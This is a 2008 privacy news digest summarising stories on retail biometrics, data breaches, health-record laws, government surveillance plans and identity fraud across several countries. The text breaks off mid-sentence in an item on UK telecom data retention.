Privacy News Highlights
16–29 May 2008
Contents:
UK – Supermarket Secretly Photos Alcohol/Cigarette Buyers, Wants National Database. 3
UK – Retailers Fingerprint Plans Prompt Privacy Concerns
US – Good Year for Privacy, Ontario Commissioner Says
CA – High-Tech Licenses Concern Privacy Commissioner
CA – PEI Appoints New Information and Privacy Commissioner
CA – New OPC Book Issued to Help Businesses Comply With Privacy Law
WW – Governments Should Avoid Web 2.0 "Trust Deficit"
US – Employee Snooping at the IRS
EU – E-voting Banned by Dutch Government
HK – Government Training to Raise Privacy Awareness
CA – Online Tax Centre Launched by City of Mississauga
CA – Senator’s Anti-Spam Bill Is Welcome News
CA – Pending Newfoundland Law Will Highlight Health-Record Privacy
CA – Albertans’ Right Confirmed to Limit Disclosure of PHI via Alberta Netcare
US – Health Data Systems Need A Comprehensive Privacy and Security Framework. 6
US – Feds Encrypt 800,000 Laptops; 1.2 Million to go
US – University Project to Protect Privacy
IN – RIM Offers Conditional Solution to Monitor BlackBerry Content
UK – Experts Criticize UK Plan For Super-Database
EU – EDPS Issues Annual Report on Data Protection
EU – EDPS Reports on EU Institutions Data Protection
EU – EU Security Agency Calls for Breach Notification Law
EU – Street View Sparks Concerns
UK – Brits Living in Fear of Identity Fraud
US – Lawsuit Filed Against LendingTree
US – President Bush Signs Genetic Information Nondiscrimination Act of 2008
US – Google Releases Google Health for Medical Records
US – California Rejects Marketing Firms Access to Patient Medical Records
US – Bank of New York Mellon Backup Tape Lost
US – Used Server Held 5,000 SSNs
WW – Gartner: Many Data Security Breaches Still Not Reported
US – New York to Issue Enhanced Drivers Licenses
US – Nevada Attorney General Offers Special Program to Assist Identity Theft Victims
UK: Identity Fraud Cases Up By Two Thirds
US – CDT Issues Privacy Principles for Digital Watermarking
WW – OECD Warns On Internet Address Change
IN – Cyber Café Web Surfing Surveilled
CA – Cyber Crime Growing Fast In Canada: Report
US – Senators Ok $1 Billion for Online Child Porn Fight
AU – Secret Anti-Doping Program Scrapped
UK – Privacy Group Launches Phorm Spoiler
WW – Facebook Disconnects Google Friend Connect
CA – Privacy and ‘Online’ Dating Are Not Mutually Exclusive
AU – New Australian Privacy Tort a Blow to Free Speech?
PH – Looking Westward on Data Privacy Framework
US – Treasury Proposes Forcing Credit Card Companies to Act as IRS Agents
US – Survey Finds Most Unaware of Sale of Personal Data
US – VeriChip to Place Implantable Division on Block
WW – One in Four Data Breaches Involves Schools
UK – Study: Schools Gathering CCTV Evidence Illegally
US – Court Ruling Gives Police Broad Authority to Check License Plates
US – No Cell Phones on Flights Please, Say Airline Passengers
UK – Shops Tracking Their Customers Via Mobile Phone
UK – UK Law Would Expand Data Retention Requirements for Telecom Providers
UK – Lawmakers Ask ISP Not to Share Data
UK – Identity Fraud Hits Net Telephony
EU – Deutsche Telekom Accused of Accessing Retained Call Data
US – DHS to Monitor Access to IT Systems
UK – MPs demand US Spooks' Guarantees On Census Data
US – NY Governor Introduces Stronger ID Theft Laws
California - Bill Would Let Pharmacies Sell Medical Records
US – Rhode Island Bill Would Grant Anonymity to Pamphleteers
US – Corporations Massively Read Employee E-Mail
IS – Draft Policy for Employee Privacy
US – TJX Fired Employee for Making Posts About Lax Security
Budgens,
a London supermarket chain, is secretly recording biometric facial photos of
people who buy cigarettes and alcohol and compares it to a database of known
underage buyers, and they’re hoping to link their database with other grocery
chains around the country. This means that just bringing a bottle up to the
till means that your likeness and details will be added to a nationwide
database, recording your movements and purchasing habits. It is believed to be
the first time a British retailer has used the technology in this way. [Source]
The
use of fingerprint recognition technology to monitor retail staff working hours
has serious privacy implications, say experts. A small group of Budgens and
Costcutter shops have introduced the system to monitor the hours worked by
staff and to prevent staff clocking each other in. The systems do not store the
print itself, but log a number which can then be matched against the number
generated next time that person clocks in. But there are serious legal data
protection implications, according to Gus Hosein, a digital privacy expert at
the London School of Economics (LSE). “The number is still a unique
identifier,” he said. “It’s fine if people have a choice, but if you compel
workers to do this, you run in to the dirty side of the law.” The retailers’
plans may raise issues regarding compliance with the Data Protection Act (DPA),
which “requires that the employer justify that fingerprint technology is
appropriate in the circumstance and must demonstrate why other less intrusive
methods would not do the job.” Fingerprint technology project aimed at tracking
travellers at Heathrow Terminal 5 was abandoned last month following pressure
from the ICO. [Source]
A
number of new technologies, as well as important rulings by Ontario courts,
have improved the privacy of people in Ontario in 2007 according to the annual
report of the Information and Privacy Commissioner, released last week. For the
first time ever, Commissioner Ann Cavoukian used her power in September of 2007
to order the city of Ottawa and the Ottawa police to stop collecting personal
information from people selling used items to pawn shops. The commissioner also
noted the development of a number of new technologies that could help protect
people’s privacy. The report for 2007 also shows that year setting a new record
in FOI requests, much of the increase coming from requests for information from
municipalities and police forces. [Source]
[Ont. privacy czar worried about high-tech
licences] [Ontario's
privacy czar frustrated by lack of progress on EHR]
Ontario's
Information and Privacy Commissioner Ann Cavoukian has urged the federal government
to withdraw a requirement for provinces to collect citizenship information and
create databases for Canada's enhanced driver's licences. Speaking to reporters
in Toronto yesterday, Cavoukian said that this "mirror database"
method could lead to the exposure of personal information and identity theft,
says a CTV.ca report. "It would create enormous risks in terms of
inaccuracy, the potential for identity theft of creating a new database with
very sensitive information, not to mention a waste of efficiency in taxpayer
dollars," Cavoukian said. She is also concerned that radio frequency
transmitters may be embedded into the licences, citing the risk of improper
monitoring. [Source] [Sharing
citizenship data a 'no brainer,' Ottawa told] [Ottawa urged to share
database]
PEI’s
new Acting Information and Privacy Commissioner has been appointed, effective
May 26, 2008. Her name is Judith M.
Haldemann, and she recently retired as Legislative Counsel with the province.
[Source]
The
Office of the Privacy Commissioner of Canada (OPC) has launched a new book to
help businesses comply with PIPEDA. Leading
by Example: Key Developments in the First Seven Years of PIPEDA shares
insights gained since PIPEDA came into force in 2000 by highlighting some of
the leading case findings on a number of important issues, including emerging
technologies, data breaches and security measures. “Hundreds of our findings
and numerous judicial decisions together form an essential body of
recommendations and case law,” says Assistant Commissioner Elizabeth Denham. [Source] [Leading by
Example: Key Developments in the First Seven Years of the Personal Information
Protection and Electronic Documents Act] See also: [IAPP INTERVIEW: Elizabeth Denham]
If
governments want to attract citizens to use their online services, they should
give users control of their own information, according to former privacy
commissioner and IAPP board member Malcolm Crompton, who spoke to attendees at
the CeBIT conference in Sydney yesterday. Crompton, who is now managing
director of Information Integrity Systems, said that requiring citizens to submit
vast amounts of personal data imposes too much risk on users with little or no
liability on the agency, creating what he describes as a "trust
deficit." "Where is the citizen in this level of thinking?"
Crompton asked. [Source]
Snooping
is on the rise at the Internal Revenue Service (IRS), according to a Treasury
Department investigator who testified before Congress last month. Five hundred
twenty one cases of unauthorized access were reported last year and, earlier
this week, five employees at the Fresno, California processing center were
charged with computer fraud and unauthorized access to tax return information
for unnecessary viewing of taxpayers' files, says a Wired report. "Whether
the intent is fraud or simply curiosity, the potential exists for unauthorized
access to tax information on high-profile individuals and other taxpayers,"
said J. Russell George, Treasury Department Inspector General for Tax
Administration. [Source]
Because
of a risk of eavesdropping the government of the Netherlands has banned
electronic voting machines from future elections, and will return to paper
voting. In its decision, the government also banned so-called voting printers.
Because they leave a paper trail, the printers had been suggested as a
potential alternative to traditional voting computers that store the vote
counts in their memory. A group of experts dismissed the printer option. The
group concluded that “even with regular testing of each printer, it can’t be
guaranteed that all devices stay within the required emission limits” that
safeguard against eavesdropping. Earlier rulings against voting machines have
occurred in other regions including California, Germany, the U.K., Ireland and
Italy. [Source]
Hong
Kong government staff will undergo training to raise awareness on information
security and privacy. Topics to be covered include the handling of official
documents outside the office and a review of relevant policies and guidelines.
Government departments accounted for 14 of 30 cases involving leaks of personal
data over the past three years. These leaks have been attributed to a lack of
awareness of information-security regulations, policies and
guidelines--especially those concerning the use of portable electronic devices
and file-sharing software. [Source]
An
online tax centre was launched by the City of Mississauga, which will allow
residents to access self-serve tax services. It will also allow online users to
access a variety of tax services on the City’s Web site. These services
include: viewing tax account details and tax and assessment information, ability
to change “Preauthorized Tax Payment” plan, and purchase tax certificates. The
new online tax self-service tax centre can be accessed at:
www.mississauga.ca/etax [Source]
While
a government-backed anti-spam bill is still nowhere to be seen, earlier this
month Senator Yoine Goldstein quietly stepped into the policy void by
introducing the Anti-Spam Act (ASA). Modeled after widely lauded
Australian anti-spam legislation, the ASA is the most comprehensive Canadian
anti-spam proposal floated to date and even if it languishes in the Senate it
promises to place additional pressure on the government to reveal its own
anti-spam plan. The bill targets spam by creating new form and content
requirements for commercial electronic messages as well as establishing
prohibitions on common spamming techniques. The content requirements include
the need to clearly identify the sender of the message, provide accurate
“header” information, avoid misleading subject lines and include information on
how recipients can contact the sender directly. Commercial email senders must
also establish a functional unsubscribe facility that enables recipients to
easily opt-out of future messages. The ASA also establishes a broad prohibition
against “the sending of a commercial electronic message unless the recipient
has consented to receive the message.” This provision contains several key
exceptions, however, since political parties, charities, not-for-profit
businesses, survey companies, educational institutions and any business with a
prior business relationship are all entitled to presume that they have the
necessary consents unless recipients expressly “opt-out.” Senator Goldstein’s
bill also targets common spamming technologies. It prohibits the use of
address-harvesting software that spammers use to gather email addresses,
outlaws “dictionary attacks” in which spammers send millions of messages
without regard for whether the email addresses are valid, and bans the creation
of phishing websites that are used by identity thieves to fraudulently obtain
personal information. While many of these provisions match those found in other
jurisdictions, the most noteworthy aspect of the ASA is its tough penalties.
First time offenders face a fine of up to $500,000 and any repeat offences
could result in fines of up $1.5 million. Moreover, the bill includes possible
prison terms of up to five years for violating the core anti-spam provisions
and grants the private sector the right to seek injunctions to block further
spamming activity. Unlike some prior bills that sought to hold Internet service
providers responsible for the spam on their networks, the ASA creates
incentives for ISPs to cut off spamming activity by granting ISPs the right to
cancel the service of known spammers without fear of liability. The ASA has
reached second reading in the Senate and now awaits the prospect of committee
hearings. [Source]
New
rules governing health records will strengthen Newfoundland and Labrador
patients’ privacy, the health minister Ross Wiseman said last week. Wiseman
said that the new Protection of Personal Health Information Act, which
is currently before the house of assembly, will more clearly spell out how a
patient’s data can be used, and by whom. The act, once passed into law, will
set out new rules for the collection, use and disclosure of people’s personal
health records. Wiseman said the goal of the legislation is to create a culture
of privacy in the health-care system. The new act allows patients to prevent
the sharing of their personal information. For example, patients can designate
that certain parts of their medical records are not to be shared beyond any
pre-designated health professionals. The government expects to have the
legislation proclaimed into law in 18 months, to allow for education and
training within the health-care system. A public education campaign is also
planned. [Source]
Frank
Work, Alberta Information and Privacy Commissioner, has confirmed that individuals
can ask that disclosure of their health information through Alberta Netcare,
Alberta’s electronic health record, be limited. On conclusion of a recent
investigation, it was recommended that Alberta Health and Wellness take steps
to fully implement the technology that will allow custodians to limit the
disclosure of health information through Alberta Netcare and communicate the
availability of this option to Netcare users and Albertans. The Department has
taken immediate steps to implement these recommendations. [Coverage]
The investigation report and its recommendations can be found at http://www.oipc.ab.ca [Alberta
Netcare investigation decision]
CDT's
Health Privacy Project of the Center released a paper urging policymakers and
the private sector to develop and implement a comprehensive privacy and
security framework to govern the wide range of computer and Internet-based
systems being created to share sensitive health information. The paper examines the key issues
confronting the adoption of information technology in the health care field and
offers suggestions on policies and business practices that will protect patient
rights while facilitating the kinds of information sharing that can reduce
costs and improve care. [HPP Policy
Framework Document, May 15, 2008]
In
an effort to secure the personal data of millions, U.S. federal agencies have
begun purchasing and deploying encryption software for the roughly two million
laptops, handhelds and removable storage devices at federal, state and local
government agencies nationwide. Over the last 12 months agencies have purchased
800,000 licenses for the software through the government’s Data at Rest
Encryption program, a joint venture of the General Services Administration and
the Department of Defense. [Source]
Oklahoma
State University's Technology Business Assessment Group has provided $100,000
to fund a project aimed at protecting the privacy of online data using the data
shuffling method. The project, "Developing Data Protection Software Based
on Data Shuffling," involves faculty researchers from OSU and the
University of Kentucky. Data shuffling, the method developed by OSU professor
Rathindra Sarathy, "rearranges confidential information from data sets in
a complex, coordinated fashion so that it maintains confidentiality." The
goal is to develop the shuffling method into a marketable software program. [Source] [Powerpoint] [Paper]
In
a new turn to the BlackBerry row, the Canadian vendor of the service, Research
in Motion (RIM), is understood to have agreed to pass on sensitive customer
data to the Indian government but with a condition that DoT takes
responsibility in case of a loss to any user due to leakage of information. [Source] [Source]Follow
up: [RIM says it can’t provide e-mail
interception in India]
Plans
for a super-database containing the details of all phone calls and e-mails sent
in the UK have been heavily criticized by experts. The government is considering
the changes as part of its ongoing fight against serious crime and terrorism.
Assistant Information Commissioner Jonathan Bamford has warned that the UK
could be "sleepwalking into a surveillance society". [BBC]
On
15 May, the European Data Protection Supervisor’s office presented their 4th
Annual Report, which runs through the main features of the EDPS activities in
2007 on supervisory and consultative tasks. It also emphasises the impact of
the Lisbon Treaty that provides for an enhanced protection of personal data.
The EDPS believes that the new Treaty should be seen as an opportunity for the
EU administration to demonstrate that effective protection of personal data is
a basic value underlying EU policies. The report shows that there has been
substantial progress in supervision in 2007. The report highlights
The
EDPS also gave further effect to his advisory role on new EU legislative
proposals having an impact on data protection with the publication of 12
legislative opinions. Special emphasis was put on:
[EDPS 2007 Annual
Report | Executive
Summary] [Full
text]
On
14 May, the European Data Protection Supervisor (EDPS) presented his general
report named the spring 2007 initiative measuring the implementation of
Regulation (EC) 45/2001 on the protection of individuals with regard to the
processing of personal data by the institutions and bodies of the Community.
The report shows that the “Spring 2007” exercise has helped to boost compliance
with the Regulation, if only because it has encouraged the appointment of a
Data Protection Officer (DPO) in every EU institution and operational agency.
In addition, it has prompted most institutions and agencies to draft an
inventory of processing operations involving personal data, which allowed a
more systematic approach to implementation. From a more general perspective, EU
institutions and bodies have also devoted more efforts in raising awareness
among EU staff on data protection issues. [Source]
The
European Network and Information Security Agency (ENISA) released a report
outlining the need for a continent-wide data breach notification law. ENISA is
an information-sharing body. The report calls for a U.S.-style notification
law, highlighting the fact that Internet security is vital to the EU economy.”
[Source]
[ENISA 2007 Annual Report]
[press
briefing podcast]
European
Union Data Protection Supervisor Peter Hustnix says if Google plans to launch
its "Street View" feature in Europe, they should consider reforming
it, as the service may breach EU privacy laws, says a BusinessWeek report.
Street View gives users a 360-degree view of city streets in full color. The
feature is built using composites from photos taken from Google cars outfitted
with roof-mounted cameras. Street View's North American release raised both
excitement and privacy concerns. Hustnix said, "Making pictures on the
street is in many cases not a problem, but making pictures everywhere is
certainly going to create some problems." [Source]
Identity
fraud, and information theft from mobile phones top the list of security
concerns in the UK. 86%, of almost 1,000 Brits polled in the Unisys Security
Index are worried about the unauthorised access or misuse of their personal
information. Computer security is less of a priority in the UK, the index found
only a third are very concerned about viruses and spam, with 38% not concerned
at all. Confidence is also growing in the security of online shopping,
particularly among the over-54s, with only 33% of residents very concerned
about the security of transactions. However, the UK remains unconvinced about
using mobiles to pay bills or shop online, with 80% not willing to use a mobile
or personal organiser to conduct financial transactions. The index comes on the
back of a similar survey of 4,500 adults in the UK by telecoms regulator Ofcom,
which revealed approximately half the respondents were worried about disclosing
personal details online, and concerns about identity fraud had risen by 15% in
two years. Unisys said the index showed that telecoms providers, banks and retailers
would face an uphill struggle to convince the public to accept mobile phone
payments. [Source]
A lawsuit
seeking class action status has been filed against LendingTree LLC in US
District Court. The suit alleges that LendingTree did not sufficiently protect
sensitive data in its customer loan request forms. In April, LendingTree
acknowledged that several employees provided a number of mortgage lenders with
access to the data, which include names, Social Security numbers (SSNs) and
income. LendingTree has filed a lawsuit against two former employees and
several mortgage lenders. [Source]
The
Genetic Information Nondiscrimination Act prohibits health
insurers and employers from discriminating on the basis of genetic information.
The Genetic Information Nondiscrimination Act would prevent health
insurers from canceling, denying, refusing to renew, or changing the terms or
premiums of coverage based solely on a genetic predisposition toward a specific
disease. The legislation also bars employers from using individuals’ genetic
information when making hiring, firing, promotion, and other employment-related
decisions. [Source]
Google
unveiled Google Health, a
long-anticipated health information service that combines the leading Web
company’s classic search services with a user’s personal health records online.
The password-protected service provides a personalized profile for Google users
of their basic medical history and gathers relevant information connected to a
user’s health conditions. One feature includes a link to help users find
doctors by location or specialization. The “virtual pillbox” notifies patients
when they need to take medications and possible drug interactions between
different drugs. Users can also import medical records if they are available in
digital form. The service includes links to major U.S. pharmacies, doctors’
groups and medical testing labs. Partners include Walgreen Co, Longs Drugs
Stores Corp, CVS Caremark Group, AllScripts, Quest Diagnostics and the
Cleveland Clinic. The company had previously said it was working with health
insurers such as Aetna Inc and Wal-Mart Stores Inc pharmacies. Google aims to
foster sharing of information between these services, but keep control in
patients’ hands, allowing them to schedule appointments or refill prescriptions,
for example. The electronic health records field remains in its early stages.
For example, while medical providers are covered by U.S. privacy laws, there is
little in the way of established privacy, security and data usage standards for
electronic personal health records despite decades of industry effort.
Nonetheless, Google has created an extra level of security around personal
health information stored on its computers. The service also contains a variety
of cautions and notifications to alert individual users to the dangers of
exposing their health data. [Source]
The
California Senate rejected a bill this week that would have allowed the sharing
of a patient's confidential medical information regarding prescription drugs
among a pharmacy, third party corporations and pharmaceutical companies. The
bill was granted a second chance to pass the Senate next week. The Consumer
Federation of California opposed SB 1096 (Calderon) because it raised
significant privacy and health care concerns for patients. The bill would have
created an exception to California's Medical Information Act, and allow
sharing of confidential patient drug prescription information without a
patient's consent. Under SB 1096, drug stores would provide confidential
patient prescription information to third party businesses. The third party
would prepare mailings to patients that would have the appearance of coming
from the pharmacy. These third party marketing corporations would, in turn
provide patient information to, and receive payment from, pharmaceutical drug
manufacturers to send the mailings, ostensibly to remind patients to take their
medications or to renew their prescriptions. Consumer rights and privacy
protection groups argued that this type of privacy invasion should not occur
without the consent of the patient. [Source]
[Groups Want
More Privacy in E-Prescribing Mandate]
Connecticut
Attorney General Richard Blumenthal wants to know how the Bank of New York Mellon
lost unencrypted computer backup tapes that hold PII of more than 4 million
customers. The box of tapes was lost in February; the tapes contain names,
addresses, SSNs and possibly account numbers and balances. The breach affects
several hundred thousand Connecticut customers of People’s United Bank; Bank of
New York had the data because it was helping People’s through a business
transition. Blumenthal wants to know why Bank of New York waited until just six
weeks ago to start notifying affected customers. Blumenthal himself did not
learn of the breach until earlier this week. In a related story, Connecticut
Governor M. Jodi Rell has directed the state’s Consumer Protection Division to
subpoena Bank of New York Mellon Corp. and People’s United Bank. [Source]
[Source]
[Source]
See also: [Connecticut
Bank Customers File Lawsuit Over Missing Backup Tapes]
A
man who bought used computer equipment at an auction found that one of the
servers contained 5,000 SSNs from the Oklahoma state Tax Commission and the
Corporation Commission. Oklahoma state policy requires that the agency
discarding computer equipment be responsible for erasing any data before the
equipment is sold. The Oklahoma Corporation Commission has begun removing hard
drives from equipment it sells at state auctions. [Source]
A
recent study from Gartner found that many retail data security breaches in the
US are not being reported to customers. Of 50 US retailers surveyed, 18 said
they knew they had experienced a data breach, but just three of the retailers
had publicly disclosed the breach. While the small sample precludes drawing
hard conclusions, the trend suggests that “there are a lot more breaches than
we hear about,” according to Gartner analyst Avivah Litan. Four of the
retailers participating in the survey had been fined for failing to comply with
Payment Card Industry (PCI) standards, and 11 more were threatened with fines.
[Source]
Governor
David A. Paterson has announced an agreement between New York State and the
Federal Department of Homeland Security (DHS) permitting the state to issue an
Enhanced Driver License (EDL). The new license is being developed by the State
Department of Motor Vehicles (DMV), and it is intended to expedite cross-border
land and sea travel for the citizens of the state. To get an EDL, New Yorkers
will be required to visit a DMV office to provide various proofs of identity
and citizenship, which will be verified by the DMV. The verification will
support the DMV’s core principle of one driver, one license and each EDL will
have various security features within the document. [Source]
In
2007, Nevada was ranked third in the nation for identity theft crimes. To help
address this situation, the Nevada A-G office is offering the Nevada Identity
Theft Passport program as a service to Nevada residents who are identity theft
victims to assist them with recovery from this intrusive and damaging crime.
After you discover that you have become the victim of identity theft, you will
need to file a police report with local law enforcement and ask for the Nevada
Identity Theft Passport brochure and application. You will then make an
appointment with your local County Sheriff or Attorney General’s Office to
complete an online “Passport” application. The Sheriff’s Office will then send
the completed application to the Attorney General’s office in Carson City.
After we verify the application, you will receive a secure, personalized Nevada
“Passport” program card that contains your picture, signature and thumb print.
This card is an effective tool for you to use in order to demonstrate that your
identity has been stolen. It is likely to be most useful to help you explain
your situation to merchants, banks and law enforcement officials. An Identity
Theft Passport does not prevent identity theft. It can only assist in helping
to clear things up afterwards. [Source]
London
was Britain’s identity fraud capital with people almost twice as likely to
become victims as those in the rest of the country. Kensington was the most
vulnerable area with residents facing a risk more than three-and-a-half times
the average. It was followed in the top five by Richmond-upon-Thames, Putney,
Wimbledon and the King’s Road area of Chelsea. Commuter towns, including
Guildford, St Albans and Windsor, also faced a risk that was twice the national
average. Credit data company Experian, which compiled the figures, said more
than 6,000 victims sought help from its fraud team in 2007 compared with 3,500
in 2006. It said the typical identity fraud victim is a homeowner aged between
26 and 45. Those earning more than £50,000 a year are almost three times more
likely to fall victim to identity fraudsters. [Source]
CDT
has released a paper offering a set of principles for addressing potential
privacy considerations when deploying digital watermarking technology. This
technology embeds information within the content of digital media files in a
form that is machine readable but often imperceptible to humans. Digital
watermarking has a variety of applications and is increasingly being considered
as a tool for deterring copyright infringement. CDT’s paper is intended to
provide guidance for companies that plan to use the technology to communicate
information that is specific to individual consumers. [CDT Paper: Privacy
Principles for Digital Watermarking, May 29, 2008] [CDT Press Release, May 29, 2008]
Slow
progress on the net's new addressing system risks breaking it into regional
blocks, warns the OECD. The problem may come as nations move to the new scheme
at different paces, says the Organisation for Economic Co-operation and
Development. [BBC]
[OECD Report on Ipv6]
It
is now mandatory for Uttar Pradesh cyber café owners to verify the identity of
Web surfers and a local has provided the software necessary to build a database
of them. Customer Registration and Identification, or CRISH, will include the
photographs and finger prints of those sitting before a cyber café’s computer.
These identifiers “will be automatically stored in the database of the computer
with date, time and terminal in which they logged on, eliminating the need for
maintaining a register of visitors,” said the director of the company providing
the database software. The database is expected to remove the anonymity of
cyber cafe e-mail communications in hopes that users won’t feel comfortable
sending threatening emails from those locales, and to give investigators a
quick and accurate means of identifying the sender of such a communication. [Source]
Canadians
are more likely to be victims of crime on the Internet than they are on the
streets, suggests a new survey commissioned by the Canadian Association of
Police Boards. Cyber crime – things such as identity theft, computer viruses
and online harassment – is very close to surpassing illicit drugs as the top
crime category in North America. The survey, completed last January by Deloitte
LLP, found that nearly half of the 567 respondents had been victims of cyber
crime, and 70% said they did not report the crime. Almost everyone surveyed --
95% -- thought they were being targeted by cyber criminals. “If that doesn’t
scare you, I don’t know what will scare you,” said Calgary police Chief Rick
Hanson during a news conference last week. [Source]
A
U.S. Senate panel has unanimously approved a bill that would encourage federal,
state, and local police to use and create special software designed to nab
child pornography swappers on peer-to-peer file-sharing networks. The bill
would allocate more than $1 billion over the next eight years for a broad array
of efforts aimed at tackling Internet crimes against children. The Senate
Judiciary Committee voted to send an amended version of the Combating Child
Exploitation Act to the full slate of politicians for a vote. [CNET]
The
Australian Sports Anti-Doping Authority (ASADA) has been forced to scrap a
secret pilot program aimed at identifying whether or not Olympic-bound athletes
were using banned substances because the program breached the Information Privacy
Principles of the Privacy Act. The ASADA had teamed up with Medicare to
cross-check athletes' medical records, unbeknownst to the athletes. Although
the Australian Government Solicitor (AGS) had originally approved the program,
in a second opinion following Sport Minister Kate Ellis's consultation with the
Office of the Privacy Commissioner, the AGS ruled that the ASADA did not have
legal authority to conduct the program. [Source]
A
privacy group has launched a new piece of software that it claims will make the
data collected by the Phorm advertising service “absolutely worthless”. The
AntiPhorm group - which describes itself as “a loose conglomeration of
concerned individuals comprised of artists, programmers and designers” - says
it wants to prevent ISPs from profiting from their customers’ personal surfing
habits. “By harvesting the information you divulge every time you surf the
internet, BT alone expects to make an additional $170M annually,” the website
claims. “The increase of data mining, profiling of you and your surfing habits
is a worrying trend, on a global industrial scale.” To throw Phorm off the
scent, the team has developed an application called AntiPhormLite that sits in
the background, visiting random sites. “It connects to the web and
intelligently simulates natural surfing behaviour across thousands of
customisable topics,” the site claims. “This creates a background noise of
false information disguising and inverting your own interests. We believe our
technology is indistinguishable from that of a typical user engaging the
internet.” [Source] SEE ALSO: [UPDATE: Charter Will Track Your Internet Activity
Regardless Of Whether You Opt Out]
Facebook
says it denied Google Friend Connect access to Facebook user data for failing
to respect its privacy requirements “We’ve found that [Friend Connect]
redistributes user information from Facebook to other developers without users’
knowledge, which doesn’t respect the privacy standards our users have come to
expect and is a violation of our Terms of Service,” said Facebook in a blog
post. “Just as we’ve been forced to do for other applications that redistribute
data in a way users might not expect or understand, we’ve had to suspend Friend
Connect’s access to Facebook user information until it comes into compliance.”
[Source] See also: [Cross-Site
Scripting Flaw in Facebook] [Source]
Today,
about 40% of single adults use online dating. The problem with most dating
sites is they offer no privacy. Because profiles/photos must be searchable by
other members, there is a requirement to surrender control of sensitive
personal information. Amazingly, millions of online daters willingly share this
private information. However, there are also millions of single adults that
avoid online dating because they place significant value upon personal privacy
and safety. For these people, exposing their personal lives on the public
internet for anybody and everybody to search and find is not acceptable.
“Privacy and online dating should not be mutually exclusive,” explains Joel M.
Blatt, founder of Sparkbliss. Sparkbliss is fueling the “private online dating”
revolution. Sparkbliss works like this: each member develops a private network
of trusted friends and families who can view his/her profile and make romantic
introductions on their behalf. Members have complete control over who they
invite into their private network. Some people add as many connections as
possible, while others are more conservative. Adding “super connectors,” those
people that seem to know everybody maximizes your ability to find the right
person. With online dating, people are often untruthful, superficial, and
subjective. Online dating behavior is frequently disingenuous; outdated photos
and plagiarized profiles are commonplace. In contrast, Sparkbliss enforces
honesty and integrity, because it is moderated by people that know you.
Sparkbliss goes a step further to mitigate concerns over safety by recommending
introductions include some kind of reference and testimonial. [Source]
The
Australian Law Reform Commission has presented the new Government with a report
that calls for a new statutory tort of privacy. The ALRC's report will be
considered by the Government for about two weeks before being tabled in
parliament and made public. The ALRC indicated it supported a tort of privacy
in a discussion paper last year that came soon after a similar call from the
NSW Law Reform Commission. It suggested that liability should be imposed for
disclosing a person's correspondence or private written, oral or electronic
communications. The NSW commission also wanted to impose liability for
disclosing "irrelevant or embarrassing facts" about a person's
private life; and using a person's "name, identity or voice" without
consent. When the ALRC outlined its scheme last year, it agreed with the NSW
commission's approach to the possible remedies that courts should be able to
order for breaching the statutory tort. The ALRC said it wanted the tort to
apply whenever there was "a reasonable expectation of privacy and where
the action that is the subject of the complaint is serious enough to cause substantial
offence to an ordinary person". [Source]
The
consensus at a recent Philippines technical working group meeting was that the
nation adopt the E.U. framework on data privacy when developing data privacy
bills, says a report on Inquirer.net. The group will meet with Data Privacy
International next month to continue working towards adopting that framework.
Spokesperson for the group said that while the group is looking at models from
many nations, the EU guidelines will help industry break into the European and
Australian markets. “We are trying to break into these markets... We all agreed
to zero in on the EU model.” [Source]
The
Center For Democracy and Technology has released a briefing expressing concerns
about the privacy implications of new Treasury Proposals to track and retain
financial activities of cardholders. [Full
Story]
A
survey of 1,000 Californians finds that most are unaware of how businesses are
using and selling their personal data. The study, released by UC Berkeley's
Samuelson Law, Technology and Public Policy Clinic, shows that consumers are
largely unaware that personal information from pizza deliveries, charitable
donations, product rebate cards and other common consumer transaction materials
are fair game for begin sold. "Businesses are allowed to sell information
unless consumers object," said Chris Hoofnagle, co-author of the Samuelson
report. [Source] [Source]
Once
the RFID systems provider completes the recently announced sale of its Xmark
subsidiary, it plans to sell the rest of its assets. [Source]
Cyber
criminals are becoming bolder and more sophisticated in their operations,
federal computer security experts say. And that's bad news for schools, because
educational institutions reportedly account for approximately one of every four
data security breaches. [Source]
See also: [Medical
data breaches on the rise] [Data
Breaches Mean More Than Bad Publicity] [Preparation
Key to Managing Data Breaches] [Five IRS
Employees Charged With Snooping on Tax Returns]
CCTV
cameras illegally and breaking laws by using footage as evidence in court
cases, a new study has found. Every one of 60 schools picked at random was
found to be ignoring strict guidelines over the use of CCTV - with one school
even aiming cameras into a neighbour's back garden. The study, by national
advisory body CameraWatch, found that none of the schools met strict standards
imposed by the law and as a result evidence gathered by schools in court cases
may not even be legal.The guidelines, which schools are supposed to follow,
include warning people what cameras are used for and making sure that cameras
are pointing in the right direction. Schools must also store recording equipment
and personal data correctly. Paul Mackie, CameraWatch's compliance director,
warned that images recorded by the schools camera systems tested were grainy,
poorly exposed and in most cases illegal because procedures were not adequately
followed. He said that CameraWatch had
provided their feedback to the schools - following checks over the last two
years - but their advice was ignored.
Mr Mackie said: "If evidence is not correctly gathered, or if
cameras fail to meet minimum standards then it can be challenged in court. [Source]
In
a 2-1 decision in September 2006, the U.S. Court of Appeals for the Sixth
Circuit ruled in U.S. v. Curtis Ellison that random plate checks are not an
unconstitutional invasion of privacy and that "so long as the officer had
a right to be in a position to observe the defendant's license plate, any such
observation and corresponding use of the information on the plate does not
violate the Fourth Amendment." Ellison appealed the decision, but last
October the U.S. Supreme Court refused to hear the case, letting the appeals' decision
stand as the current law of the land. In its decision, the court joined
virtually every other federal jurisdiction in saying individuals have no
reasonable expectation of privacy when it comes to license plate numbers.
Privacy advocates disagree with the courts' finding and say they fly in the
face of the federal Drivers' Privacy Protection Act, which requires a law
enforcement purpose to access motor vehicle records. [Source]
Nearly
three-fourths of U.S. cell phone users recently surveyed don’t want to ride in
airplanes with passengers talking on phones. The results dovetail with what several
airlines have apparently decided already as they prepare to roll out wireless
in-flight services such as e-mail, text and instant messaging access from user
devices. Those services, however, apparently will not include wireless talking.
[Source]
Customers
in UK shopping centres are having their every move tracked by a new type of
surveillance that listens in on the whisperings of their mobile phones. The technology
can tell when people enter a shopping centre, what stores they visit, how long
they remain there, and what route they take as they walked around. The device
cannot access personal details about a person’s identity or contacts, but
privacy campaigners expressed concern about potential intrusion should the data
fall into the wrong hands. The surveillance mechanism works by monitoring the
signals produced by mobile handsets and then locating the phone by
triangulation – measuring the phone’s distance from three receivers. It has
already been installed in two UK shopping centres, and three more will begin
next month. [Source]
Proposed
legislation in the UK known as the Communications Data Bill would extend the
data retention requirements of the Regulation of Investigatory Powers Act
(RIPA), which presently requires that telecommunications service providers must
keep information about customers’ phone calls and text messages for one year.
The new law would expand the required information to include who initiated
